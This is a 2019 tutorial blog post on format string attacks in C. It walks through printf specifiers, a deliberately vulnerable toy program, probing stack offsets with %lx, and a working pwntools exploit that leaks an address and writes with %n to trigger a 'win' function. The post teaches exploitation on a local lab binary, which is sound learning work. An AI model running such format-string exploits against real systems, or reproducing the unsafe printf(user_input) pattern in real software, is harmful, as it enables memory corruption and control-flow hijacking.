<!DOCTYPE html>
<html prefix="og: http://ogp.me/ns# article: http://ogp.me/ns/article# " lang="en">
<head>
<meta charset="utf-8">
<meta name="description" content="Description of this method, why this work, hot to calculate input length">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>0x05 Format String Attack | Death Of Rats</title>
<link href="../../assets/css/all-nocdn.css" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Playfair+Display:700,900" rel="stylesheet">
<meta name="theme-color" content="#5670d4">
<meta name="generator" content="Nikola (getnikola.com)">
<link rel="alternate" type="application/rss+xml" title="RSS" href="../../rss.xml">
<link rel="canonical" href="https://death-of-rats.github.io/posts/format-string-attack/">
<!--[if lt IE 9]><script src="../../assets/js/html5.js"></script><![endif]--><script src="//s3-us-west-2.amazonaws.com/momently-static/loader/T90b7gA0ARA_momently.js" name="momently-script"></script><meta name="description" itemprop="description" content="Description of this method, why this work, hot to calculate input length">
<meta name="author" content="death-of-rats">
<link rel="prev" href="../how-my-shell-mess-with-me/" title="How my shell mess with me" type="text/html">
<link rel="next" href="../yasm-hello-world/" title="0x06 Yasm: Hello World! ELF64" type="text/html">
<meta property="og:site_name" content="Death Of Rats">
<meta property="og:title" content="0x05 Format String Attack">
<meta property="og:url" content="https://death-of-rats.github.io/posts/format-string-attack/">
<meta property="og:description" content="Description of this method, why this work, hot to calculate input length">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2019-04-19T00:00:00+02:00">
<meta property="article:tag" content="cpp">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="re">
</head>
<body>
<a href="#content" class="sr-only sr-only-focusable">Skip to main content</a>

<!-- Header and menu bar -->
<div class="container">
      <header class="blog-header py-3"><div class="row nbb-header align-items-center">
          <div class="col-md-3 col-xs-2 col-sm-2" style="width: auto;">
            <button class="navbar-toggler navbar-light bg-light nbb-navbar-toggler" type="button" data-toggle="collapse" data-target=".bs-nav-collapsible" aria-controls="bs-navbar" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse bs-nav-collapsible bootblog4-search-form-holder">
                
            </div>
        </div>
          <div class="col-md-6 col-xs-10 col-sm-10 bootblog4-brand" style="width: auto;">
            <a class="navbar-brand blog-header-logo text-dark" href="https://death-of-rats.github.io/">

            <span id="blog-title">Death Of Rats</span>
        </a>
          </div>
            <div class="col-md-3 justify-content-end align-items-center bs-nav-collapsible collapse flex-collapse bootblog4-right-nav">
            <nav class="navbar navbar-light bg-white"><ul class="navbar-nav bootblog4-right-nav">
<li class="nav-item">
    <a href="index.md" id="sourcelink" class="nav-link">Source</a>
    </li>


                    
            </ul></nav>
</div>
    </div>
</header><nav class="navbar navbar-expand-md navbar-light bg-white static-top"><div class="collapse navbar-collapse bs-nav-collapsible" id="bs-navbar">
            <ul class="navbar-nav nav-fill d-flex w-100">
<li class="nav-item">
<a href="../../archive.html" class="nav-link">Archive</a>
                </li>
<li class="nav-item">
<a href="../../categories/" class="nav-link">Tags</a>
                </li>
<li class="nav-item">
<a href="../../rss.xml" class="nav-link">RSS feed</a>

                
            </li>
</ul>
</div>
<!-- /.navbar-collapse -->
</nav>
</div>

<div class="container" id="content" role="main">
    <div class="body-content">
        <!--Body content-->
        
        
<article class="post-text h-entry hentry postpage" itemscope="itemscope" itemtype="http://schema.org/Article"><header><h1 class="p-name entry-title" itemprop="headline name"><a href="." class="u-url">0x05 Format String Attack</a></h1>

        <div class="metadata">
            <p class="byline author vcard"><span class="byline-name fn" itemprop="author">
                    death-of-rats
            </span></p>
            <p class="dateline"><a href="." rel="bookmark"><time class="published dt-published" datetime="2019-04-19T00:00:00+02:00" itemprop="datePublished" title="2019-04-19 00:00">2019-04-19 00:00</time></a></p>
                <p class="commentline">
        
    <a href="#disqus_thread" data-disqus-identifier="cache/posts/format-string-attack.html">Comments</a>


            
        </p>
<p class="sourceline"><a href="index.md" class="sourcelink">Source</a></p>

        </div>
        

    </header><div class="e-content entry-content" itemprop="articleBody text">
    <div>
<p>When trying to take control over the program, one must sometimes alter
information stored on the stack. StackOverflow is one possibility. It is
constrained by the order of variables placed on the stack. Format String Attack
allows overstepping this constraint. This kind of attack uses <em>printf</em>
functions family vulnerability. If one use <em>printf</em> with a variable instead of
the format string, you have your window of opportunity. Of course, if you are
the one who puts data to this variable.</p>
<!-- TEASER_END -->

<h4>What kind of string formaters can be used with printf family?</h4>
<p>What's usual case of <em>printf</em>?</p>
<pre class="code literal-block"><span></span><span class="c1">// example.c</span>
<span class="cp">#include</span> <span class="cpf">"stdio.h"</span><span class="cp"></span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">addr</span> <span class="o">=</span> <span class="mh">0x0806cd41</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="s">"DEADBEEF"</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">wordCount</span><span class="p">;</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Starting at address %#010x we search for %s.%n</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
            <span class="n">addr</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">wordCount</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"That message contains %2$d chars, and address %1$#010x.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span>
            <span class="n">addr</span><span class="p">,</span> <span class="n">wordCount</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre>


<pre class="code literal-block"><span></span>$ gcc -o example -g -static example.c
$ ./example
Starting at address 0x0806cd41 we search <span class="k">for</span> DEADBEEF.
That message contains <span class="m">54</span> chars, and address 0x0806cd41.
$ 
</pre>


<p>Here we can see 'basic' usage of this feature. I started with printing integer 
as hex number (<code>%x</code>) with leading '0x' (<code>%#</code>) and precision set to 10
characters with leading 0 (<code>%010</code>). If I want to omit '0x' I would probably
reduce precision to '08', because leaving '010' will print 3 leading 0s to fill
declared 10 chars ('000806cd41').</p>
<p><code>%s</code> will print string variable, it means that the second variable will be
interpreted as the address to an array of printable bytes. All printed characters
will be count and written to the third variable by <code>%n</code>. This variable is an
integer passed by its address.</p>
<p>The second line is also interesting. Here we print saved length and our pseudo
address. Interesting is the fact that passed arguments aren't in the order they are used
in the format string. Here I specify which arg I want to use by <code>%1$</code> or
<code>%2$</code>.  </p>
<p>A full list of formaters you can find in <code>man 3 printf</code>.</p>
<h4>How to use this knowledge</h4>
<p>Les't take a buggy program:</p>
<pre class="code literal-block"><span></span><span class="c1">// buggy.c</span>
<span class="cp">#include</span> <span class="cpf">"stdio.h"</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">"string.h"</span><span class="cp"></span>

<span class="kt">void</span> <span class="nf">win</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"==============WIN===============</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"         OK, you win!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"==============WIN===============</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
    <span class="kt">char</span> <span class="n">msg</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
    <span class="kt">char</span> <span class="n">task</span><span class="p">[</span><span class="mi">512</span><span class="p">];</span>
    <span class="kt">int</span> <span class="n">decision</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="s">"Welcome %s!...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Give me your name:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Now tell me what to do:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">scanf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">task</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"OK! I am on it.</span><span class="se">\n</span><span class="s">  -------ToDo-------</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="n">task</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">  -------ToDo-------</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

    <span class="k">if</span><span class="p">(</span><span class="n">decision</span><span class="p">)</span>
        <span class="n">win</span><span class="p">();</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</pre>


<p>First, we want to print program output for the specially prepared string. What
is in this special string? First, we want to have simply recognizable bytes,
for example, "AAAABBBB". In little endian, it would be 42424242414141.
Yes, you should know about little/big endian. If not, you would have problems
with understanding what you see in gdb or program output. Next, we want to use
<code>%x</code> to show what is on the stack. In this case, I have a 64-bit program so
I would use <code>%lx</code> format string to print all 8 bytes placed on the stack.</p>
<p>Printing value may be somewhat unclear, as the stack has different values 
every run. So for better alignment and, what is more important, to keep a steady
amount of chars printed on the screen (useful for the usage of %n) I use 
<code>%016lx</code> - it prints 8 bytes hex values padded to full 16 characters. 
A few tries show me that my string lays deep into the stack.</p>
<p>This is what I've got:</p>
<pre class="code literal-block"><span></span>$ python3 -c <span class="se">\</span>
   <span class="s2">"print('Bob\nAAAABBBB'+''.join([f'-{i+128}.%{i+128}\$016lx' for i in range(32)])+'\n')"</span><span class="se">\</span>
   <span class="p">|</span> ./buggy
Give me your name:
Welcome Bob!...
Now tell me what to <span class="k">do</span>:
OK! I am on it.
  -------ToDo-------
AAAABBBB-128.0000000000000000-129.00007f64ff3a2170-130.00007f64ff3a2170-
<span class="m">131</span>.00007f64ff191bb8-132.00007fff65a5aea0-133.00007f64ff17d4d7-134.0000000000000000-
<span class="m">135</span>.0000000000000000-136.4242424241414141-137.3231252e3832312d-138.2d786c3631302438-
<span class="m">139</span>.393231252e393231-140.312d786c36313024-141.24303331252e3033-142.33312d786c363130-
<span class="m">143</span>.3024313331252e31-144.3233312d786c3631-145.313024323331252e-146.2e3333312d786c36-
<span class="m">147</span>.3631302433333125-148.252e3433312d786c-149.6c36313024343331-150.31252e3533312d78-
<span class="m">151</span>.786c363130243533-152.3331252e3633312d-153.2d786c3631302436-154.373331252e373331-
<span class="m">155</span>.312d786c36313024-156.24383331252e3833-157.33312d786c363130-158.3024393331252e39-
<span class="m">159</span>.3034312d786c3631
  -------ToDo-------
</pre>


<p>From program output, we can deduce that our string is a 136th argument on
the stack. Let's check this with unique "DEADBEEF" (4645454244454144):</p>
<pre class="code literal-block"><span></span>$ ./buggy
Give me your name:
Bob
Welcome Bob!...
Now tell me what to <span class="k">do</span>:
DAEDBEEF.%136<span class="nv">$016</span>lx
OK! I am on it.
  -------ToDo-------
DAEDBEEF.4645454244454144
  -------ToDo-------
</pre>


<p>Here I want to mention that there are few calling conventions 
[CCnv]. In this case, we have <em>System V ABI</em>, so arguments are passed by <em>rdi</em>,
<em>rsi</em>, <em>rdx</em> and <em>rsx</em>. And this is the reason why our string is so deep in the
stack. As the first argument, it is passed by <em>rdi</em> and isn't placed on the
stack by the function. So the 136th value on the stack is, in fact, original
variable <em>task</em>.</p>
<p>In CTF or other challenges, programs will be probably compiled with an optimal
configuration for planned vulnerability, but here I want to get some program
compiled on the standard system without special flags.  All this to get real
filling on the matter. Often I read something that seems easy but in the try,
something is missing or unspoken. And sometimes the problem lays in the
'special way of compilation'.</p>
<p>By default, <strong>gcc</strong> compile example <em>buggy</em> with some security techniques. This
knowledge will be very important for the next step - exploiting. </p>
<pre class="code literal-block"><span></span>$ checksec buggy
<span class="o">[</span>*<span class="o">]</span> <span class="s1">'./buggy'</span>
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
</pre>


<h4>The good part</h4>
<p>In our case, this one vulnerability gives us a little. Every time a program can
be placed at a different memory location. So we cannot calculate proper
address and overwrite target variable in one run of <em>scanf</em>/<em>printf</em>.
Fortunately, there is another bug we can use. What's a coincidence.</p>
<p>What if one overflows <em>name</em> variable. </p>
<pre class="code literal-block"><span></span>$ python3 -c <span class="s2">"print(512*'A'+'try this:%s\n')"</span> <span class="p">|</span> ./buggy
Give me your name:
tryNow tell me what to <span class="k">do</span>:
OK! I am on it.
  -------ToDo-------
this:this:----ToDo-------
o <span class="k">do</span>:

  -------ToDo-------
</pre>


<p>Hmm, one can do better.</p>
<pre class="code literal-block"><span></span>$ python3 -c <span class="s2">"print(512*'A'+'name_address:_%p_')"</span> <span class="p">|</span> ./buggy 
Give me your name:
name_address:_0x7fff163f0ad0_Now tell me what to <span class="k">do</span>:
OK! I am on it.
  -------ToDo-------

  -------ToDo-------
</pre>


<p>So, we have an address of the <em>name</em> variable. From <strong>gdb</strong> we know the address
of <em>decision</em> variable. </p>
<pre class="code literal-block"><span></span><span class="w"> </span><span class="p">...</span><span class="w"></span>
<span class="mh">0x00000000000007e7</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">82</span><span class="o">&gt;</span><span class="err">:</span><span class="w">  </span><span class="n">lea</span><span class="w">    </span><span class="n">rax</span><span class="p">,</span><span class="o">[</span><span class="n">rbp-0x610</span><span class="o">]</span><span class="w">  </span><span class="n">#name</span><span class="w"></span>
<span class="mh">0x00000000000007ee</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">89</span><span class="o">&gt;</span><span class="err">:</span><span class="w">  </span><span class="n">mov</span><span class="w">    </span><span class="n">rsi</span><span class="p">,</span><span class="n">rax</span><span class="w"></span>
<span class="mh">0x00000000000007f1</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">92</span><span class="o">&gt;</span><span class="err">:</span><span class="w">  </span><span class="n">lea</span><span class="w">    </span><span class="n">rdi</span><span class="p">,</span><span class="o">[</span><span class="n">rip+0x18a</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x00000000000007f8</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">99</span><span class="o">&gt;</span><span class="err">:</span><span class="w">  </span><span class="n">mov</span><span class="w">    </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x0</span><span class="w"></span>
<span class="mh">0x00000000000007fd</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">104</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w">   </span><span class="mh">0x640</span><span class="w"> </span><span class="o">&lt;</span><span class="n">__isoc99_scanf</span><span class="nv">@plt</span><span class="o">&gt;</span><span class="w"></span>
<span class="w"> </span><span class="p">...</span><span class="w"></span>
<span class="mh">0x0000000000000873</span><span class="w"> </span><span class="o">&lt;+</span><span class="mi">222</span><span class="o">&gt;</span><span class="err">:</span><span class="w"> </span><span class="n">cmp</span><span class="w">    </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">rbp-0x614</span><span class="o">]</span><span class="p">,</span><span class="mh">0x0</span><span class="w"></span>
</pre>


<p><em>decision</em> is 4 bytes above <em>name</em>. Exploit should extract <em>name</em> buffer
address subtract 4 bytes and make payload. Worth to remember, our address has 6
bytes.  It means that 2 higher bytes are the 00s. If we start our payload with
it, it would be a very short payload. So let's place it at the end:
<code>AAAAAAAA-%138$n&lt;address&gt;</code>. First 8 bytes as we know are at the 136th
place. So <code>-%138$n</code> will be the 137th and out address 138th - this is why
in the payload we have this value before <code>n</code>.</p>
<p>So exploit which overwrites <em>decision</em> variable looks like this:</p>
<pre class="code literal-block"><span></span><span class="kn">from</span> <span class="nn">binascii</span> <span class="kn">import</span> <span class="n">hexlify</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>

<span class="n">p</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s1">'./buggy'</span><span class="p">)</span>
<span class="c1">#gdb.attach(p)</span>
<span class="k">print</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">readline</span><span class="p">())</span>
<span class="n">name</span> <span class="o">=</span> <span class="mi">512</span><span class="o">*</span><span class="s1">'A'</span><span class="o">+</span><span class="s1">'__%p__'</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">p</span><span class="o">.</span><span class="n">readline</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">address</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="sa">b</span><span class="s1">'__'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="n">f</span><span class="s2">"address: {address}"</span><span class="p">)</span>
<span class="n">addr</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">address</span><span class="p">,</span> <span class="mi">16</span><span class="p">)</span>
<span class="n">addr</span> <span class="o">-=</span> <span class="mi">4</span>
<span class="k">print</span><span class="p">(</span><span class="n">f</span><span class="s2">"address of boolean: {hex(addr)}"</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">'AAAAAAAA-%138$n-'</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span>
<span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">p</span><span class="o">.</span><span class="n">recv</span><span class="p">())</span>
</pre>


<pre class="code literal-block"><span></span>$ python3 buggy_exploit.py
<span class="o">[</span>+<span class="o">]</span> Starting program <span class="s1">'./buggy'</span>: Done
b<span class="s1">'Give me your name:\n'</span>
b<span class="s1">'__0x7ffc26994b00__Now tell me what to do:\n'</span>
address: b<span class="s1">'0x7ffc26994b00'</span>
address of boolean: 0x7ffc26994afc
b<span class="s1">'OK! I am on it.\n  -------ToDo-------\nAAAAAAAA--\xfcJ\x99&amp;\xfc\x7f\n  -------ToDo-------\n==============WIN===============\n         OK, you win!\n==============WIN===============\n'</span>
<span class="o">[</span>*<span class="o">]</span> Program <span class="s1">'./buggy'</span> stopped with <span class="nb">exit</span> code <span class="m">0</span>
</pre>


<p>It's not the end of this topic. What I've learned from this, but not expected to, 
is how good are default security mechanisms implemented in our compilators. How much
benefit they give us. I have to rewrite buggy example a few times, so I can later 
exploit it in this way. These security techniques do not fix programmers
mistakes but make exploiting them more difficult or impossible.</p>
<p>And I know, this example programs looks way too 80's. No one writes like that now.
But, should bad code looks pretty...</p>
<p><strong>...SQUEAK!</strong></p>
<p>  </p>
<h4>References:</h4>
<ul>
<li>[EFSV] <a href="https://crypto.stanford.edu/cs155old/cs155-spring08/papers/formatstring-1.2.pdf">Exploiting Format String Vulnerabilities (2001)</a>
</li>
<li>[CCnv] <a href="https://en.wikipedia.org/wiki/X86_calling_conventions">Calling Conventions - Wikipedia article</a>
</li>
<li>[LBEn] <a href="https://en.wikipedia.org/wiki/Endianness">Endianness</a>
</li>
</ul>
</div>
    </div>
    <aside class="postpromonav"><nav><ul itemprop="keywords" class="tags">
<li><a class="tag p-category" href="../../categories/cpp/" rel="tag">cpp</a></li>
            <li><a class="tag p-category" href="../../categories/ctf/" rel="tag">ctf</a></li>
            <li><a class="tag p-category" href="../../categories/pwn/" rel="tag">pwn</a></li>
            <li><a class="tag p-category" href="../../categories/re/" rel="tag">re</a></li>
        </ul>
<ul class="pager hidden-print">
<li class="previous">
                <a href="../how-my-shell-mess-with-me/" rel="prev" title="How my shell mess with me">Previous post</a>
            </li>
            <li class="next">
                <a href="../yasm-hello-world/" rel="next" title="0x06 Yasm: Hello World! ELF64">Next post</a>
            </li>
        </ul></nav></aside><section class="comments hidden-print"><h2>Comments</h2>
        
        
        <div id="disqus_thread"></div>
        <script>
        var disqus_shortname ="death-of-rats-github-io",
            disqus_url="https://death-of-rats.github.io/posts/format-string-attack/",
        disqus_title="0x05 Format String Attack",
        disqus_identifier="cache/posts/format-string-attack.html",
        disqus_config = function () {
            this.language = "en";
        };
        (function() {
            var dsq = document.createElement('script'); dsq.async = true;
            dsq.src = 'https://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script><noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a>
</noscript>
    <a href="https://disqus.com" class="dsq-brlink" rel="nofollow">Comments powered by <span class="logo-disqus">Disqus</span></a>


        </section></article><script>var disqus_shortname="death-of-rats-github-io";(function(){var a=document.createElement("script");a.async=true;a.src="https://"+disqus_shortname+".disqus.com/count.js";(document.getElementsByTagName("head")[0]||document.getElementsByTagName("body")[0]).appendChild(a)}());</script><!--End of body content--><footer id="footer">
            Contents © 2019         death-of-rats - powered by         <a href="https://getnikola.com" rel="nofollow">Nikola</a>         
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons Licence" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/80x15.png"></a><br>This work is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>. <br><img src="https://travis-ci.org/death-of-rats/death-of-rats.github.io.svg?branch=source"></footer>
</div>
</div>


        <script src="../../assets/js/all-nocdn.js"></script><!-- Social buttons --><div id="addthisbox" class="addthis_toolbox addthis_peekaboo_style addthis_default_style addthis_label_style addthis_32x32_style">
<a class="addthis_button_more">Share</a>
<ul>
<li>
<a class="addthis_button_facebook">Facebook</a>
</li>
<li>
<a class="addthis_button_twitter">Twitter</a>
</li>
</ul>
</div>
<script src="https://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4f7088a56bb93798"></script><!-- End of social buttons --><!-- fancy dates --><script>
    moment.locale("en");
    fancydates(0, "YYYY-MM-DD HH:mm");
    </script><!-- end fancy dates --><script>
    baguetteBox.run('a.reference:not(.islink)', {
        captions: function(element) {
            return element.getElementsByTagName('img')[0].alt;
    }});
    baguetteBox.run('img:not(.islink)', {
        captions: function(element) {
            return element.alt;
    }});
    </script>
</body>
</html>
